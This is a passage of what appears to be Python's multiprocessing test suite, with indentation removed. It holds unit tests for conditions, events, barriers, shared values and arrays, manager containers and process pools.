self.assertEqual(acquire(False), False)
self.assertTimingAlmostEqual(acquire.elapsed, 0.0)
self.assertEqual(acquire(False, None), False)
self.assertTimingAlmostEqual(acquire.elapsed, 0.0)
self.assertEqual(acquire(False, TIMEOUT1), False)
self.assertTimingAlmostEqual(acquire.elapsed, 0)
self.assertEqual(acquire(True, TIMEOUT2), False)
self.assertTimingAlmostEqual(acquire.elapsed, TIMEOUT2)
self.assertEqual(acquire(timeout=TIMEOUT3), False)
self.assertTimingAlmostEqual(acquire.elapsed, TIMEOUT3)
class _TestCondition(BaseTestCase):
@classmethod
def f(cls, cond, sleeping, woken, timeout=None):
cond.acquire()
sleeping.release()
cond.wait(timeout)
woken.release()
cond.release()
def assertReachesEventually(self, func, value):
for i in range(10):
try:
if func() == value:
break
except NotImplementedError:
break
time.sleep(DELTA)
time.sleep(DELTA)
self.assertReturnsIfImplemented(value, func)
def check_invariant(self, cond):
# this is only supposed to succeed when there are no sleepers
if self.TYPE == 'processes':
try:
sleepers = (cond._sleeping_count.get_value() -
cond._woken_count.get_value())
self.assertEqual(sleepers, 0)
self.assertEqual(cond._wait_semaphore.get_value(), 0)
except NotImplementedError:
pass
def test_notify(self):
cond = self.Condition()
sleeping = self.Semaphore(0)
woken = self.Semaphore(0)
p = self.Process(target=self.f, args=(cond, sleeping, woken))
p.daemon = True
p.start()
self.addCleanup(p.join)
p = threading.Thread(target=self.f, args=(cond, sleeping, woken))
p.daemon = True
p.start()
self.addCleanup(p.join)
# wait for both children to start sleeping
sleeping.acquire()
sleeping.acquire()
# check no process/thread has woken up
time.sleep(DELTA)
self.assertReturnsIfImplemented(0, get_value, woken)
# wake up one process/thread
cond.acquire()
cond.notify()
cond.release()
# check one process/thread has woken up
time.sleep(DELTA)
self.assertReturnsIfImplemented(1, get_value, woken)
# wake up another
cond.acquire()
cond.notify()
cond.release()
# check other has woken up
time.sleep(DELTA)
self.assertReturnsIfImplemented(2, get_value, woken)
# check state is not mucked up
self.check_invariant(cond)
p.join()
def test_notify_all(self):
cond = self.Condition()
sleeping = self.Semaphore(0)
woken = self.Semaphore(0)
# start some threads/processes which will timeout
for i in range(3):
p = self.Process(target=self.f,
args=(cond, sleeping, woken, TIMEOUT1))
p.daemon = True
p.start()
self.addCleanup(p.join)
t = threading.Thread(target=self.f,
args=(cond, sleeping, woken, TIMEOUT1))
t.daemon = True
t.start()
self.addCleanup(t.join)
# wait for them all to sleep
for i in range(6):
sleeping.acquire()
# check they have all timed out
for i in range(6):
woken.acquire()
self.assertReturnsIfImplemented(0, get_value, woken)
# check state is not mucked up
self.check_invariant(cond)
# start some more threads/processes
for i in range(3):
p = self.Process(target=self.f, args=(cond, sleeping, woken))
p.daemon = True
p.start()
self.addCleanup(p.join)
t = threading.Thread(target=self.f, args=(cond, sleeping, woken))
t.daemon = True
t.start()
self.addCleanup(t.join)
# wait for them to all sleep
for i in range(6):
sleeping.acquire()
# check no process/thread has woken up
time.sleep(DELTA)
self.assertReturnsIfImplemented(0, get_value, woken)
# wake them all up
cond.acquire()
cond.notify_all()
cond.release()
# check they have all woken
self.assertReachesEventually(lambda: get_value(woken), 6)
# check state is not mucked up
self.check_invariant(cond)
def test_notify_n(self):
cond = self.Condition()
sleeping = self.Semaphore(0)
woken = self.Semaphore(0)
# start some threads/processes
for i in range(3):
p = self.Process(target=self.f, args=(cond, sleeping, woken))
p.daemon = True
p.start()
self.addCleanup(p.join)
t = threading.Thread(target=self.f, args=(cond, sleeping, woken))
t.daemon = True
t.start()
self.addCleanup(t.join)
# wait for them to all sleep
for i in range(6):
sleeping.acquire()
# check no process/thread has woken up
time.sleep(DELTA)
self.assertReturnsIfImplemented(0, get_value, woken)
# wake some of them up
cond.acquire()
cond.notify(n=2)
cond.release()
# check 2 have woken
self.assertReachesEventually(lambda: get_value(woken), 2)
# wake the rest of them
cond.acquire()
cond.notify(n=4)
cond.release()
self.assertReachesEventually(lambda: get_value(woken), 6)
# doesn't do anything more
cond.acquire()
cond.notify(n=3)
cond.release()
self.assertReturnsIfImplemented(6, get_value, woken)
# check state is not mucked up
self.check_invariant(cond)
def test_timeout(self):
cond = self.Condition()
wait = TimingWrapper(cond.wait)
cond.acquire()
res = wait(TIMEOUT1)
cond.release()
self.assertEqual(res, False)
self.assertTimingAlmostEqual(wait.elapsed, TIMEOUT1)
@classmethod
def _test_waitfor_f(cls, cond, state):
with cond:
state.value = 0
cond.notify()
result = cond.wait_for(lambda : state.value==4)
if not result or state.value != 4:
sys.exit(1)
@unittest.skipUnless(HAS_SHAREDCTYPES, 'needs sharedctypes')
def test_waitfor(self):
# based on test in test/lock_tests.py
cond = self.Condition()
state = self.Value('i', -1)
p = self.Process(target=self._test_waitfor_f, args=(cond, state))
p.daemon = True
p.start()
with cond:
result = cond.wait_for(lambda : state.value==0)
self.assertTrue(result)
self.assertEqual(state.value, 0)
for i in range(4):
time.sleep(0.01)
with cond:
state.value += 1
cond.notify()
join_process(p)
self.assertEqual(p.exitcode, 0)
@classmethod
def _test_waitfor_timeout_f(cls, cond, state, success, sem):
sem.release()
with cond:
expected = 0.1
dt = time.time()
result = cond.wait_for(lambda : state.value==4, timeout=expected)
dt = time.time() - dt
# borrow logic in assertTimeout() from test/lock_tests.py
if not result and expected * 0.6 < dt < expected * 10.0:
success.value = True
@unittest.skipUnless(HAS_SHAREDCTYPES, 'needs sharedctypes')
def test_waitfor_timeout(self):
# based on test in test/lock_tests.py
cond = self.Condition()
state = self.Value('i', 0)
success = self.Value('i', False)
sem = self.Semaphore(0)
p = self.Process(target=self._test_waitfor_timeout_f,
args=(cond, state, success, sem))
p.daemon = True
p.start()
self.assertTrue(sem.acquire(timeout=TIMEOUT))
# Only increment 3 times, so state == 4 is never reached.
for i in range(3):
time.sleep(0.01)
with cond:
state.value += 1
cond.notify()
join_process(p)
self.assertTrue(success.value)
@classmethod
def _test_wait_result(cls, c, pid):
with c:
c.notify()
time.sleep(1)
if pid is not None:
os.kill(pid, signal.SIGINT)
def test_wait_result(self):
if isinstance(self, ProcessesMixin) and sys.platform != 'win32':
pid = os.getpid()
else:
pid = None
c = self.Condition()
with c:
self.assertFalse(c.wait(0))
self.assertFalse(c.wait(0.1))
p = self.Process(target=self._test_wait_result, args=(c, pid))
p.start()
self.assertTrue(c.wait(60))
if pid is not None:
self.assertRaises(KeyboardInterrupt, c.wait, 60)
p.join()
class _TestEvent(BaseTestCase):
@classmethod
def _test_event(cls, event):
time.sleep(TIMEOUT2)
event.set()
def test_event(self):
event = self.Event()
wait = TimingWrapper(event.wait)
# Removed temporarily, due to API shear, this does not
# work with threading._Event objects. is_set == isSet
self.assertEqual(event.is_set(), False)
# Removed, threading.Event.wait() will return the value of the __flag
# instead of None. API Shear with the semaphore backed mp.Event
self.assertEqual(wait(0.0), False)
self.assertTimingAlmostEqual(wait.elapsed, 0.0)
self.assertEqual(wait(TIMEOUT1), False)
self.assertTimingAlmostEqual(wait.elapsed, TIMEOUT1)
event.set()
# See note above on the API differences
self.assertEqual(event.is_set(), True)
self.assertEqual(wait(), True)
self.assertTimingAlmostEqual(wait.elapsed, 0.0)
self.assertEqual(wait(TIMEOUT1), True)
self.assertTimingAlmostEqual(wait.elapsed, 0.0)
# self.assertEqual(event.is_set(), True)
event.clear()
#self.assertEqual(event.is_set(), False)
p = self.Process(target=self._test_event, args=(event,))
p.daemon = True
p.start()
self.assertEqual(wait(), True)
p.join()
#
# Tests for Barrier - adapted from tests in test/lock_tests.py
#
# Many of the tests for threading.Barrier use a list as an atomic
# counter: a value is appended to increment the counter, and the
# length of the list gives the value. We use the class DummyList
# for the same purpose.
class _DummyList(object):
def __init__(self):
wrapper = multiprocessing.heap.BufferWrapper(struct.calcsize('i'))
lock = multiprocessing.Lock()
self.__setstate__((wrapper, lock))
self._lengthbuf[0] = 0
def __setstate__(self, state):
(self._wrapper, self._lock) = state
self._lengthbuf = self._wrapper.create_memoryview().cast('i')
def __getstate__(self):
return (self._wrapper, self._lock)
def append(self, _):
with self._lock:
self._lengthbuf[0] += 1
def __len__(self):
with self._lock:
return self._lengthbuf[0]
def _wait():
# A crude wait/yield function not relying on synchronization primitives.
time.sleep(0.01)
class Bunch(object):
"""
A bunch of threads.
"""
def __init__(self, namespace, f, args, n, wait_before_exit=False):
"""
Construct a bunch of `n` threads running the same function `f`.
If `wait_before_exit` is True, the threads won't terminate until
do_finish() is called.
"""
self.f = f
self.args = args
self.n = n
self.started = namespace.DummyList()
self.finished = namespace.DummyList()
self._can_exit = namespace.Event()
if not wait_before_exit:
self._can_exit.set()
threads = []
for i in range(n):
p = namespace.Process(target=self.task)
p.daemon = True
p.start()
threads.append(p)
def finalize(threads):
for p in threads:
p.join()
self._finalizer = weakref.finalize(self, finalize, threads)
def task(self):
pid = os.getpid()
self.started.append(pid)
try:
self.f(*self.args)
finally:
self.finished.append(pid)
self._can_exit.wait(30)
assert self._can_exit.is_set()
def wait_for_started(self):
while len(self.started) < self.n:
_wait()
def wait_for_finished(self):
while len(self.finished) < self.n:
_wait()
def do_finish(self):
self._can_exit.set()
def close(self):
self._finalizer()
class AppendTrue(object):
def __init__(self, obj):
self.obj = obj
def __call__(self):
self.obj.append(True)
class _TestBarrier(BaseTestCase):
"""
Tests for Barrier objects.
"""
N = 5
defaultTimeout = 30.0 # XXX Slow Windows buildbots need generous timeout
def setUp(self):
self.barrier = self.Barrier(self.N, timeout=self.defaultTimeout)
def tearDown(self):
self.barrier.abort()
self.barrier = None
def DummyList(self):
if self.TYPE == 'threads':
return []
elif self.TYPE == 'manager':
return self.manager.list()
else:
return _DummyList()
def run_threads(self, f, args):
b = Bunch(self, f, args, self.N-1)
try:
f(*args)
b.wait_for_finished()
finally:
b.close()
@classmethod
def multipass(cls, barrier, results, n):
m = barrier.parties
assert m == cls.N
for i in range(n):
results[0].append(True)
assert len(results[1]) == i * m
barrier.wait()
results[1].append(True)
assert len(results[0]) == (i + 1) * m
barrier.wait()
try:
assert barrier.n_waiting == 0
except NotImplementedError:
pass
assert not barrier.broken
def test_barrier(self, passes=1):
"""
Test that a barrier is passed in lockstep
"""
results = [self.DummyList(), self.DummyList()]
self.run_threads(self.multipass, (self.barrier, results, passes))
def test_barrier_10(self):
"""
Test that a barrier works for 10 consecutive runs
"""
return self.test_barrier(10)
@classmethod
def _test_wait_return_f(cls, barrier, queue):
res = barrier.wait()
queue.put(res)
def test_wait_return(self):
"""
test the return value from barrier.wait
"""
queue = self.Queue()
self.run_threads(self._test_wait_return_f, (self.barrier, queue))
results = [queue.get() for i in range(self.N)]
self.assertEqual(results.count(0), 1)
close_queue(queue)
@classmethod
def _test_action_f(cls, barrier, results):
barrier.wait()
if len(results) != 1:
raise RuntimeError
def test_action(self):
"""
Test the 'action' callback
"""
results = self.DummyList()
barrier = self.Barrier(self.N, action=AppendTrue(results))
self.run_threads(self._test_action_f, (barrier, results))
self.assertEqual(len(results), 1)
@classmethod
def _test_abort_f(cls, barrier, results1, results2):
try:
i = barrier.wait()
if i == cls.N//2:
raise RuntimeError
barrier.wait()
results1.append(True)
except threading.BrokenBarrierError:
results2.append(True)
except RuntimeError:
barrier.abort()
def test_abort(self):
"""
Test that an abort will put the barrier in a broken state
"""
results1 = self.DummyList()
results2 = self.DummyList()
self.run_threads(self._test_abort_f,
(self.barrier, results1, results2))
self.assertEqual(len(results1), 0)
self.assertEqual(len(results2), self.N-1)
self.assertTrue(self.barrier.broken)
@classmethod
def _test_reset_f(cls, barrier, results1, results2, results3):
i = barrier.wait()
if i == cls.N//2:
# Wait until the other threads are all in the barrier.
while barrier.n_waiting < cls.N-1:
time.sleep(0.001)
barrier.reset()
else:
try:
barrier.wait()
results1.append(True)
except threading.BrokenBarrierError:
results2.append(True)
# Now, pass the barrier again
barrier.wait()
results3.append(True)
def test_reset(self):
"""
Test that a 'reset' on a barrier frees the waiting threads
"""
results1 = self.DummyList()
results2 = self.DummyList()
results3 = self.DummyList()
self.run_threads(self._test_reset_f,
(self.barrier, results1, results2, results3))
self.assertEqual(len(results1), 0)
self.assertEqual(len(results2), self.N-1)
self.assertEqual(len(results3), self.N)
@classmethod
def _test_abort_and_reset_f(cls, barrier, barrier2,
results1, results2, results3):
try:
i = barrier.wait()
if i == cls.N//2:
raise RuntimeError
barrier.wait()
results1.append(True)
except threading.BrokenBarrierError:
results2.append(True)
except RuntimeError:
barrier.abort()
# Synchronize and reset the barrier. Must synchronize first so
# that everyone has left it when we reset, and after so that no
# one enters it before the reset.
if barrier2.wait() == cls.N//2:
barrier.reset()
barrier2.wait()
barrier.wait()
results3.append(True)
def test_abort_and_reset(self):
"""
Test that a barrier can be reset after being broken.
"""
results1 = self.DummyList()
results2 = self.DummyList()
results3 = self.DummyList()
barrier2 = self.Barrier(self.N)
self.run_threads(self._test_abort_and_reset_f,
(self.barrier, barrier2, results1, results2, results3))
self.assertEqual(len(results1), 0)
self.assertEqual(len(results2), self.N-1)
self.assertEqual(len(results3), self.N)
@classmethod
def _test_timeout_f(cls, barrier, results):
i = barrier.wait()
if i == cls.N//2:
# One thread is late!
time.sleep(1.0)
try:
barrier.wait(0.5)
except threading.BrokenBarrierError:
results.append(True)
def test_timeout(self):
"""
Test wait(timeout)
"""
results = self.DummyList()
self.run_threads(self._test_timeout_f, (self.barrier, results))
self.assertEqual(len(results), self.barrier.parties)
@classmethod
def _test_default_timeout_f(cls, barrier, results):
i = barrier.wait(cls.defaultTimeout)
if i == cls.N//2:
# One thread is later than the default timeout
time.sleep(1.0)
try:
barrier.wait()
except threading.BrokenBarrierError:
results.append(True)
def test_default_timeout(self):
"""
Test the barrier's default timeout
"""
barrier = self.Barrier(self.N, timeout=0.5)
results = self.DummyList()
self.run_threads(self._test_default_timeout_f, (barrier, results))
self.assertEqual(len(results), barrier.parties)
def test_single_thread(self):
b = self.Barrier(1)
b.wait()
b.wait()
@classmethod
def _test_thousand_f(cls, barrier, passes, conn, lock):
for i in range(passes):
barrier.wait()
with lock:
conn.send(i)
def test_thousand(self):
if self.TYPE == 'manager':
self.skipTest('test not appropriate for {}'.format(self.TYPE))
passes = 1000
lock = self.Lock()
conn, child_conn = self.Pipe(False)
for j in range(self.N):
p = self.Process(target=self._test_thousand_f,
args=(self.barrier, passes, child_conn, lock))
p.start()
self.addCleanup(p.join)
for i in range(passes):
for j in range(self.N):
self.assertEqual(conn.recv(), i)
#
#
#
class _TestValue(BaseTestCase):
ALLOWED_TYPES = ('processes',)
codes_values = [
('i', 4343, 24234),
('d', 3.625, -4.25),
('h', -232, 234),
('q', 2 ** 33, 2 ** 34),
('c', latin('x'), latin('y'))
]
def setUp(self):
if not HAS_SHAREDCTYPES:
self.skipTest("requires multiprocessing.sharedctypes")
@classmethod
def _test(cls, values):
for sv, cv in zip(values, cls.codes_values):
sv.value = cv[2]
def test_value(self, raw=False):
if raw:
values = [self.RawValue(code, value)
for code, value, _ in self.codes_values]
else:
values = [self.Value(code, value)
for code, value, _ in self.codes_values]
for sv, cv in zip(values, self.codes_values):
self.assertEqual(sv.value, cv[1])
proc = self.Process(target=self._test, args=(values,))
proc.daemon = True
proc.start()
proc.join()
for sv, cv in zip(values, self.codes_values):
self.assertEqual(sv.value, cv[2])
def test_rawvalue(self):
self.test_value(raw=True)
def test_getobj_getlock(self):
val1 = self.Value('i', 5)
lock1 = val1.get_lock()
obj1 = val1.get_obj()
val2 = self.Value('i', 5, lock=None)
lock2 = val2.get_lock()
obj2 = val2.get_obj()
lock = self.Lock()
val3 = self.Value('i', 5, lock=lock)
lock3 = val3.get_lock()
obj3 = val3.get_obj()
self.assertEqual(lock, lock3)
arr4 = self.Value('i', 5, lock=False)
self.assertFalse(hasattr(arr4, 'get_lock'))
self.assertFalse(hasattr(arr4, 'get_obj'))
self.assertRaises(AttributeError, self.Value, 'i', 5, lock='navalue')
arr5 = self.RawValue('i', 5)
self.assertFalse(hasattr(arr5, 'get_lock'))
self.assertFalse(hasattr(arr5, 'get_obj'))
class _TestArray(BaseTestCase):
ALLOWED_TYPES = ('processes',)
@classmethod
def f(cls, seq):
for i in range(1, len(seq)):
seq[i] += seq[i-1]
@unittest.skipIf(c_int is None, "requires _ctypes")
def test_array(self, raw=False):
seq = [680, 626, 934, 821, 150, 233, 548, 982, 714, 831]
if raw:
arr = self.RawArray('i', seq)
else:
arr = self.Array('i', seq)
self.assertEqual(len(arr), len(seq))
self.assertEqual(arr[3], seq[3])
self.assertEqual(list(arr[2:7]), list(seq[2:7]))
arr[4:8] = seq[4:8] = array.array('i', [1, 2, 3, 4])
self.assertEqual(list(arr[:]), seq)
self.f(seq)
p = self.Process(target=self.f, args=(arr,))
p.daemon = True
p.start()
p.join()
self.assertEqual(list(arr[:]), seq)
@unittest.skipIf(c_int is None, "requires _ctypes")
def test_array_from_size(self):
size = 10
# Test for zeroing (see issue #11675).
# The repetition below strengthens the test by increasing the chances
# of previously allocated non-zero memory being used for the new array
# on the 2nd and 3rd loops.
for _ in range(3):
arr = self.Array('i', size)
self.assertEqual(len(arr), size)
self.assertEqual(list(arr), [0] * size)
arr[:] = range(10)
self.assertEqual(list(arr), list(range(10)))
del arr
@unittest.skipIf(c_int is None, "requires _ctypes")
def test_rawarray(self):
self.test_array(raw=True)
@unittest.skipIf(c_int is None, "requires _ctypes")
def test_getobj_getlock_obj(self):
arr1 = self.Array('i', list(range(10)))
lock1 = arr1.get_lock()
obj1 = arr1.get_obj()
arr2 = self.Array('i', list(range(10)), lock=None)
lock2 = arr2.get_lock()
obj2 = arr2.get_obj()
lock = self.Lock()
arr3 = self.Array('i', list(range(10)), lock=lock)
lock3 = arr3.get_lock()
obj3 = arr3.get_obj()
self.assertEqual(lock, lock3)
arr4 = self.Array('i', range(10), lock=False)
self.assertFalse(hasattr(arr4, 'get_lock'))
self.assertFalse(hasattr(arr4, 'get_obj'))
self.assertRaises(AttributeError,
self.Array, 'i', range(10), lock='notalock')
arr5 = self.RawArray('i', range(10))
self.assertFalse(hasattr(arr5, 'get_lock'))
self.assertFalse(hasattr(arr5, 'get_obj'))
#
#
#
class _TestContainers(BaseTestCase):
ALLOWED_TYPES = ('manager',)
def test_list(self):
a = self.list(list(range(10)))
self.assertEqual(a[:], list(range(10)))
b = self.list()
self.assertEqual(b[:], [])
b.extend(list(range(5)))
self.assertEqual(b[:], list(range(5)))
self.assertEqual(b[2], 2)
self.assertEqual(b[2:10], [2,3,4])
b *= 2
self.assertEqual(b[:], [0, 1, 2, 3, 4, 0, 1, 2, 3, 4])
self.assertEqual(b + [5, 6], [0, 1, 2, 3, 4, 0, 1, 2, 3, 4, 5, 6])
self.assertEqual(a[:], list(range(10)))
d = [a, b]
e = self.list(d)
self.assertEqual(
[element[:] for element in e],
[[0, 1, 2, 3, 4, 5, 6, 7, 8, 9], [0, 1, 2, 3, 4, 0, 1, 2, 3, 4]]
)
f = self.list([a])
a.append('hello')
self.assertEqual(f[0][:], [0, 1, 2, 3, 4, 5, 6, 7, 8, 9, 'hello'])
def test_list_iter(self):
a = self.list(list(range(10)))
it = iter(a)
self.assertEqual(list(it), list(range(10)))
self.assertEqual(list(it), []) # exhausted
# list modified during iteration
it = iter(a)
a[0] = 100
self.assertEqual(next(it), 100)
def test_list_proxy_in_list(self):
a = self.list([self.list(range(3)) for _i in range(3)])
self.assertEqual([inner[:] for inner in a], [[0, 1, 2]] * 3)
a[0][-1] = 55
self.assertEqual(a[0][:], [0, 1, 55])
for i in range(1, 3):
self.assertEqual(a[i][:], [0, 1, 2])
self.assertEqual(a[1].pop(), 2)
self.assertEqual(len(a[1]), 2)
for i in range(0, 3, 2):
self.assertEqual(len(a[i]), 3)
del a
b = self.list()
b.append(b)
del b
def test_dict(self):
d = self.dict()
indices = list(range(65, 70))
for i in indices:
d[i] = chr(i)
self.assertEqual(d.copy(), dict((i, chr(i)) for i in indices))
self.assertEqual(sorted(d.keys()), indices)
self.assertEqual(sorted(d.values()), [chr(i) for i in indices])
self.assertEqual(sorted(d.items()), [(i, chr(i)) for i in indices])
def test_dict_iter(self):
d = self.dict()
indices = list(range(65, 70))
for i in indices:
d[i] = chr(i)
it = iter(d)
self.assertEqual(list(it), indices)
self.assertEqual(list(it), []) # exhausted
# dictionary changed size during iteration
it = iter(d)
d.clear()
self.assertRaises(RuntimeError, next, it)
def test_dict_proxy_nested(self):
pets = self.dict(ferrets=2, hamsters=4)
supplies = self.dict(water=10, feed=3)
d = self.dict(pets=pets, supplies=supplies)
self.assertEqual(supplies['water'], 10)
self.assertEqual(d['supplies']['water'], 10)
d['supplies']['blankets'] = 5
self.assertEqual(supplies['blankets'], 5)
self.assertEqual(d['supplies']['blankets'], 5)
d['supplies']['water'] = 7
self.assertEqual(supplies['water'], 7)
self.assertEqual(d['supplies']['water'], 7)
del pets
del supplies
self.assertEqual(d['pets']['ferrets'], 2)
d['supplies']['blankets'] = 11
self.assertEqual(d['supplies']['blankets'], 11)
pets = d['pets']
supplies = d['supplies']
supplies['water'] = 7
self.assertEqual(supplies['water'], 7)
self.assertEqual(d['supplies']['water'], 7)
d.clear()
self.assertEqual(len(d), 0)
self.assertEqual(supplies['water'], 7)
self.assertEqual(pets['hamsters'], 4)
l = self.list([pets, supplies])
l[0]['marmots'] = 1
self.assertEqual(pets['marmots'], 1)
self.assertEqual(l[0]['marmots'], 1)
del pets
del supplies
self.assertEqual(l[0]['marmots'], 1)
outer = self.list([[88, 99], l])
self.assertIsInstance(outer[0], list) # Not a ListProxy
self.assertEqual(outer[-1][-1]['feed'], 3)
def test_namespace(self):
n = self.Namespace()
n.name = 'Bob'
n.job = 'Builder'
n._hidden = 'hidden'
self.assertEqual((n.name, n.job), ('Bob', 'Builder'))
del n.job
self.assertEqual(str(n), "Namespace(name='Bob')")
self.assertTrue(hasattr(n, 'name'))
self.assertTrue(not hasattr(n, 'job'))
#
#
#
def sqr(x, wait=0.0):
time.sleep(wait)
return x*x
def mul(x, y):
return x*y
def raise_large_valuerror(wait):
time.sleep(wait)
raise ValueError("x" * 1024**2)
def identity(x):
return x
class CountedObject(object):
n_instances = 0
def __new__(cls):
cls.n_instances += 1
return object.__new__(cls)
def __del__(self):
type(self).n_instances -= 1
class SayWhenError(ValueError): pass
def exception_throwing_generator(total, when):
if when == -1:
raise SayWhenError("Somebody said when")
for i in range(total):
if i == when:
raise SayWhenError("Somebody said when")
yield i
class _TestPool(BaseTestCase):
@classmethod
def setUpClass(cls):
super().setUpClass()
cls.pool = cls.Pool(4)
@classmethod
def tearDownClass(cls):
cls.pool.terminate()
cls.pool.join()
cls.pool = None
super().tearDownClass()
def test_apply(self):
papply = self.pool.apply
self.assertEqual(papply(sqr, (5,)), sqr(5))
self.assertEqual(papply(sqr, (), {'x':3}), sqr(x=3))
def test_map(self):
pmap = self.pool.map
self.assertEqual(pmap(sqr, list(range(10))), list(map(sqr, list(range(10)))))
self.assertEqual(pmap(sqr, list(range(100)), chunksize=20),
list(map(sqr, list(range(100)))))
def test_starmap(self):
psmap = self.pool.starmap
tuples = list(zip(range(10), range(9,-1, -1)))
self.assertEqual(psmap(mul, tuples),
list(itertools.starmap(mul, tuples)))
tuples = list(zip(range(100), range(99,-1, -1)))
self.assertEqual(psmap(mul, tuples, chunksize=20),
list(itertools.starmap(mul, tuples)))
def test_starmap_async(self):
tuples = list(zip(range(100), range(99,-1, -1)))
self.assertEqual(self.pool.starmap_async(mul, tuples).get(),
list(itertools.starmap(mul, tuples)))
def test_map_async(self):
self.assertEqual(self.pool.map_async(sqr, list(range(10))).get(),
list(map(sqr, list(range(10)))))
def test_map_async_callbacks(self):
call_args = self.manager.list() if self.TYPE == 'manager' else []
self.pool.map_async(int, ['1'],
callback=call_args.append,
error_callback=call_args.append).wait()
self.assertEqual(1, len(call_args))
self.assertEqual([1], call_args[0])
self.pool.map_async(int, ['a'],
callback=call_args.append,
error_callback=call_args.append).wait()
self.assertEqual(2, len(call_args))
self.assertIsInstance(call_args[1], ValueError)
def test_map_unplicklable(self):
# Issue #19425 -- failure to pickle should not cause a hang
if self.TYPE == 'threads':
self.skipTest('test not appropriate for {}'.format(self.TYPE))
class A(object):
def __reduce__(self):
raise RuntimeError('cannot pickle')
with self.assertRaises(RuntimeError):
self.pool.map(sqr, [A()]*10)
def test_map_chunksize(self):
try:
self.pool.map_async(sqr, [], chunksize=1).get(timeout=TIMEOUT1)
except multiprocessing.TimeoutError:
self.fail("pool.map_async with chunksize stalled on null list")
def test_map_handle_iterable_exception(self):
if self.TYPE == 'manager':
self.skipTest('test not appropriate for {}'.format(self.TYPE))
# SayWhenError seen at the very first of the iterable
with self.assertRaises(SayWhenError):
self.pool.map(sqr, exception_throwing_generator(1, -1), 1)
# again, make sure it's reentrant
with self.assertRaises(SayWhenError):
self.pool.map(sqr, exception_throwing_generator(1, -1), 1)
with self.assertRaises(SayWhenError):
self.pool.map(sqr, exception_throwing_generator(10, 3), 1)
class SpecialIterable:
def __iter__(self):
return self
def __next__(self):
raise SayWhenError
def __len__(self):
return 1
with self.assertRaises(SayWhenError):
self.pool.map(sqr, SpecialIterable(), 1)
with self.assertRaises(SayWhenError):
self.pool.map(sqr, SpecialIterable(), 1)
def test_async(self):
res = self.pool.apply_async(sqr, (7, TIMEOUT1,))
get = TimingWrapper(res.get)
self.assertEqual(get(), 49)
self.assertTimingAlmostEqual(get.elapsed, TIMEOUT1)
def test_async_timeout(self):
res = self.pool.apply_async(sqr, (6, TIMEOUT2 + 1.0))
get = TimingWrapper(res.get)
self.assertRaises(multiprocessing.TimeoutError, get, timeout=TIMEOUT2)
self.assertTimingAlmostEqual(get.elapsed, TIMEOUT2)
def test_imap(self):
it = self.pool.imap(sqr, list(range(10)))
self.assertEqual(list(it), list(map(sqr, list(range(10)))))
it = self.pool.imap(sqr, list(range(10)))
for i in range(10):
self.assertEqual(next(it), i*i)
self.assertRaises(StopIteration, it.__next__)
it = self.pool.imap(sqr, list(range(1000)), chunksize=100)
for i in range(1000):
self.assertEqual(next(it), i*i)
self.assertRaises(StopIteration, it.__next__)
def test_imap_handle_iterable_exception(self):
if self.TYPE == 'manager':
self.skipTest('test not appropriate for {}'.format(self.TYPE))
# SayWhenError seen at the very first of the iterable
it = self.pool.imap(sqr, exception_throwing_generator(1, -1), 1)
self.assertRaises(SayWhenError, it.__next__)
# again, make sure it's reentrant
it = self.pool.imap(sqr, exception_throwing_generator(1, -1), 1)
self.assertRaises(SayWhenError, it.__next__)
it = self.pool.imap(sqr, exception_throwing_generator(10, 3), 1)
for i in range(3):
self.assertEqual(next(it), i*i)
self.assertRaises(SayWhenError, it.__next__)
# SayWhenError seen at start of problematic chunk's results
it = self.pool.imap(sqr, exception_throwing_generator(20, 7), 2)
for i in range(6):
self.assertEqual(next(it), i*i)
self.assertRaises(SayWhenError, it.__next__)
it = self.pool.imap(sqr, exception_throwing_generator(20, 7), 4)
for i in range(4):
self.assertEqual(next(it), i*i)
self.assertRaises(SayWhenError, it.__next__)
def test_imap_unordered(self):
it = self.pool.imap_unordered(sqr, list(range(10)))
self.assertEqual(sorted(it), list(map(sqr, list(range(10)))))
it = self.pool.imap_unordered(sqr, list(range(1000)), chunksize=100)
self.assertEqual(sorted(it), list(map(sqr, list(range(1000)))))
def test_imap_unordered_handle_iterable_exception(self):
if self.TYPE == 'manager':
self.skipTest('test not appropriate for {}'.format(self.TYPE))
# SayWhenError seen at the very first of the iterable
it = self.pool.imap_unordered(sqr,
exception_throwing_generator(1, -1),
1)
self.assertRaises(SayWhenError, it.__next__)
# again, make sure it's reentrant
it = self.pool.imap_unordered(sqr,
exception_throwing_generator(1, -1),
1)
self.assertRaises(SayWhenError, it.__next__)
it = self.pool.imap_unordered(sqr,
exception_throwing_generator(10, 3),
1)
expected_values = list(map(sqr, list(range(10))))
with self.assertRaises(SayWhenError):
# imap_unordered makes it difficult to anticipate the SayWhenError
for i in range(10):
value = next(it)
self.assertIn(value, expected_values)
expected_values.remove(value)
it = self.pool.imap_unordered(sqr,
exception_throwing_generator(20, 7),
2)
expected_values = list(map(sqr, list(range(20))))
with self.assertRaises(SayWhenError):
for i in range(20):
value = next(it)
self.assertIn(value, expected_values)
expected_values.remove(value)
def test_make_pool(self):
expected_error = (RemoteError if self.TYPE == 'manager'
else ValueError)
self.assertRaises(expected_error, self.Pool, -1)
self.assertRaises(expected_error, self.Pool, 0)
if self.TYPE != 'manager':
p = self.Pool(3)
try:
self.assertEqual(3, len(p._pool))
finally:
p.close()
p.join()
def test_terminate(self):
result = self.pool.map_async(
time.sleep, [0.1 for i in range(10000)], chunksize=1
)
self.pool.terminate()
join = TimingWrapper(self.pool.join)
join()
# Sanity check the pool didn't wait for all tasks to finish
self.assertLess(join.elapsed, 2.0)
def test_empty_iterable(self):
# See Issue 12157
p = self.Pool(1)
self.assertEqual(p.map(sqr, []), [])
self.assertEqual(list(p.imap(sqr, [])), [])
self.assertEqual(list(p.imap_unordered(sqr, [])), [])
self.assertEqual(p.map_async(sqr, []).get(), [])
p.close()
p.join()
def test_context(self):
if self.TYPE == 'processes':
L = list(range(10))
expected = [sqr(i) for i in L]
with self.Pool(2) as p:
r = p.map_async(sqr, L)
self.assertEqual(r.get(), expected)
self.assertRaises(ValueError, p.map_async, sqr, L)
@classmethod
def _test_traceback(cls):
raise RuntimeError(123) # some comment
def test_traceback(self):
# We want ensure that the traceback from the child process is
# contained in the traceback raised in the main process.
if self.TYPE == 'processes':
with self.Pool(1) as p:
try:
p.apply(self._test_traceback)
except Exception as e:
exc = e
else:
self.fail('expected RuntimeError')
self.assertIs(type(exc), RuntimeError)
self.assertEqual(exc.args, (123,))
cause = exc.__cause__
self.assertIs(type(cause), multiprocessing.pool.RemoteTraceback)
self.assertIn('raise RuntimeError(123) # some comment', cause.tb)
